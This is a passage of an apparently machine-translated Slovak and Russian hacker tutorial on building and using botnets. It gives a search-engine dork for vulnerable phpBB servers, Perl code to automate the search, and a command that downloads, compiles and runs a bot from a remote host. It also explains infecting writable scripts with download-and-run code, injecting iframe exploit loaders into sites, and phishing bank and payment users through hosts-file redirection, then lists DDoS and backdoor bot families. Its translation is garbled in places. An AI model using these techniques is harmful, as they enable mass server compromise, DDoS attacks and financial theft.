To znamená, že jednoducho pošleme požiadavku na server, ktorý ho prinúti odpovedať. A posielame to, kým server nespadne z dôvodu nedostatku prevádzky alebo času procesora. Ste však obmedzení na niektorých robotov nix, koniec koncov, musíte vytvoriť napríklad botnet systému Windows na základe AgoBot. Za týmto účelom vytvorte pre robota určitý kód, ktorý bude vyhľadávať zraniteľnosti lsasl / dcom na počítačoch, ktoré sa pripájajú k serveru, na ktorom je robot nainštalovaný.

[Vytvorte botnet]
V skutočnosti je veľmi jednoduché vytvoriť botnet. Aby sme to urobili, musíme nájsť zraniteľnosť v akomkoľvek webovom skripte. Zistená zraniteľnosť by mala umožňovať vykonávanie príkazov shellu tlmočníka. Keď nájdete zraniteľnosť, venujte pozornosť názvu súboru backend, jeho hlavičke a názvu systému zraniteľnosti. Teraz s týmito údajmi musíte napísať dobrý vyhľadávací dotaz. Napríklad som vzal známu zraniteľnosť v phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ sock = IO :: Socket :: INET-> nové (PeerAddr => "search.aol.com", PeerPort => "80", P ro to => "tcp") alebo ďalšie; vytlačiť $ sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP /1.0 \ n \ n"; @resu =<$sock>; zavrieť ($ ponožka);

Wget http://server.org/bot.c;gcc bot.c -o bash; chmod + x bash; ./ bash;

Tu možno vidieť dva problémy naraz. wget a gcc sa nemusia zobrazovať alebo je zakázané ich používanie. Tu nám pomôžu rookery fech, curl and get alebo prehliadač konzoly lynx alebo inak použiť protokol ftp. Jeho implementácia je komplikovanejšia, ale plus je, že ftp je všade. Pokiaľ ide o kompilátor, môžete jednoducho skompilovať binárne číslo vo svojom shelli a dúfať, že s kompatibilitou bude všetko v poriadku, alebo prepísať robota do interpretovaných jazykov- Perl alebo PHP. Každá metóda má svoje výhody a nevýhody, ktorú použiť. Voľba je na vás. Som zvyknutý vyťažený server maximálne využiť. Koniec koncov, robot na serveri nix vydrží iba do prvého reštartu počítača. Existuje jedna zaujímavá cesta von z tejto situácie. Robot vyhľadá čitateľné súbory (.pl, .php) dostupné na zápis a pridá k nim kód na stiahnutie a spustenie. Alebo si môžete vytvoriť iný botnet pre Windows. Je tiež ľahké ho implementovať. Tu potrebujeme zraniteľnosť v internetovom prehliadači ( internet Explorer, Opera, Mozilla), ktorá sa sťahuje a spúšťa požadovaný súbor... Ďalej sa vytvorí položka inframe, ktorá stiahne náš škodlivý kód. Tento záznam je pridaný ku všetkým indexovým súborom (alebo kdekoľvek je html kód, všetko závisí od vašej drzosti). Malý skript Haz, ktorý nájdete aj v archívoch, výborne zvláda tento druh práce. Bugtrack je plný záznamov o kritických zraniteľnostiach v programe Internet Explorer, takže budeme mať zapnutý aj botnet Systémy Windows(Jeho výhody som spomenul vyššie). To je všetko, spustite nášho vyhľadávacieho červa na vysokorýchlostnom škrupine, vypite kávu (pivo, vodka, paradajkový džús), prejdite na kanál IRC špecifikovaný vo vlastnostiach robota a sledujte počet svojich podriadených. Na záver sa chcem pozdraviť s každým, kto ma pozná a popriať vám veľa šťastia. Nenechajte sa chytiť.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Zraniteľnosť v phpBB je relevantná do verzie 2.0.16, aj keď vývojári tvrdia, že ju opravili v 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Phishing
Je veľmi výhodné používať roboty ako phishingovú organizáciu. Na to potrebujeme špeciálne phishingové stránky, ktoré napodobňujú web, ktorý potrebujeme, a dobrý hosting, dedikovaný server alebo VDS. Môžete si také stránky vytvoriť, kúpiť, nájsť na internete. Výber je obrovský. Phishing je najčastejšie organizovaný na nasledujúcich stránkach: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om a ďalšie, tak či onak spojené s elektronickým obchodovaním. Ďalej robot Windows prepíše súbor \ system32 \ drivers \ etc \ hosts tak, že k nemu pridá adresu IP vášho servera a priradí mu alias webu, ktorý potrebujete. Formát súboru je nasledujúci:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

To znamená, že zadaním stránok e-gold.com a paypal.com do prehliadača sa používateľ dostane na náš server bez akéhokoľvek podozrenia. Na serveri phisher sú zasa pridané položky o zodpovedajúcich doménach do httpd.conf.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias ​​"e-gold.com" "www.e-gold.com"

Riadok prehliadača bude samozrejme obsahovať známu adresu e-gold.com a na stránku sa prihlási aj pokročilý používateľ bez toho, aby mal čokoľvek podozrenie. Pre úplnosť poviem, že ak používateľ používa server proxy, táto metóda nebude fungovať.

Boti pre každý vkus
Agobot / Phatbot / Forbot / XtremBot
Toto je najlepšia rodina robotov. Napísané v C ++. Majú mnoho funkcií ochrany proti detekcii a majú viac ako 500 úprav vďaka jasne definovanej modulárnej štruktúre.
SDBot / RBot / UrBot / UrXBot
V súčasnosti veľmi populárne roboty pre útoky DDOS. Majú mnoho ďalších funkcií. Ako napríklad Sock4 discovery, keylogger, automatický skener zraniteľností lsass a dcom. Má tiež funkciu presmerovania požiadaviek na webové stránky antivírusových spoločností lokálny serverúpravou \ system32 \ driver \ etc \ hosts a inštaláciou malého falošného webový server na port 80.
Roboty DSNX
Tento robot môže vykonávať útoky DDOS, skenovanie portov a ďalšie drobnosti.
Q8 Roboty
Vynikajúci robot pre systémy nix. Vyznačuje sa kompaktným kódom (27 kB, pozostáva z jedného súboru) a dobrou funkčnosťou. Dá sa dynamicky aktualizovať stiahnutím a spustením nového súboru. Dobre implementuje základné implementácie DDOS (SYN-záplava, UDP-záplava). Vie, ako vykonávať systémové príkazy. Tiež sa dobre maskuje v systéme.
kaiten
Tiež dobrý robot pre systémy Unix / Linux. Vie, ako otvoriť vzdialený shell na zachytenom serveri.
Roboty založené na jazyku Perl
Jedná sa o veľmi malé roboty napísané v Perle. Používa sa na útoky DDOS na systémy založené na Unixe.

---
Tento článok má veľkú zaujatosť voči hackovaniu, takže nie je jasný - opýtajte sa.